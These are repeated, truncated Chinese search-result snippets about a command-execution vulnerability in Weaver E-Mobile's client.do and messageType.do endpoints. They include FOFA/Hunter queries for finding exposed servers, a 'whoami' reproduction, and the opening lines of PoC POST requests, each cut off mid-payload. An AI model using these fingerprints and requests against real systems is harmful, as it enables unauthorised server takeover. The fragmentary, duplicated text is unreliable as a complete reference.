泛微e-mobile-client.do存在命令执行漏洞 1. 确认漏洞存在性 泛微e-Mobile移动管理平台确实存在通过/client.do接口进行命令执行的漏洞。这一漏洞允许攻击者通过构造特定的HTTP请求,在服务器上执行任意命令,从而获得服务器的控制权限。多个来源(如[@1@]、[@2@]、[@3@]、[@4@])均确认了此漏洞的存在。 2. 分...
泛微E-Mobile 6.0被爆存在漏洞命令执行。现已确认该漏洞可被攻击者利用,攻击者可通 过在输入中添加特殊字符或命令来序列欺骗应用程序将其作为有效命令去执行,从而获取服 务器的执行权限。 资产探测 FOFA:server="EMobileServer" 漏洞复现 Burp放包-命令执行成功(whoami) ...
泛微E-Mobile 6.0 存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了) 版本信息:E-Mobile 6.0 漏洞复现 fofa语法:fofa:app="泛微-EMobile" hunter:app.name="泛微 e-mobile OA" 登录页面如下: POC: POST /client.doHTTP/1.1Host: Content-Type: multipart/form-data; boundary=---WebKitFormBound...
## 泛微E-Mobile-client.do存在命令执行漏洞 ## fofa ``` "Weaver E-Mobile" ``` ## poc ``` POST /client.do HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko...
1 parent9d51952commit8503520 Showing1 changed filewith28 additionsand0 deletions. Whitespace Ignore whitespace Split Unified 28 changes: 28 additions & 0 deletions28泛微E-Mobile-client.do存在命令执行漏洞.md Original file line numberDiff line numberDiff line change ...
29 changes: 29 additions & 0 deletions 29 泛微E-Mobile-messageType.do存在命令执行漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,29 @@ ## 泛微E-Mobile-messageType.do存在命令执行漏洞 ## fofa ``` "Weaver E-Mobile" ``` ## poc ``` POST /messageType...
29 changes: 29 additions & 0 deletions 29 泛微E-Mobile-messageType.do存在命令执行漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,29 @@ ## 泛微E-Mobile-messageType.do存在命令执行漏洞 ## fofa ``` "Weaver E-Mobile" ``` ## poc ``` POST /messageType...
29 changes: 29 additions & 0 deletions 29 泛微E-Mobile-messageType.do存在命令执行漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,29 @@ ## 泛微E-Mobile-messageType.do存在命令执行漏洞 ## fofa ``` "Weaver E-Mobile" ``` ## poc ``` POST /messageType...
29 changes: 29 additions & 0 deletions 29 泛微E-Mobile-messageType.do存在命令执行漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,29 @@ ## 泛微E-Mobile-messageType.do存在命令执行漏洞 ## fofa ``` "Weaver E-Mobile" ``` ## poc ``` POST /messageType...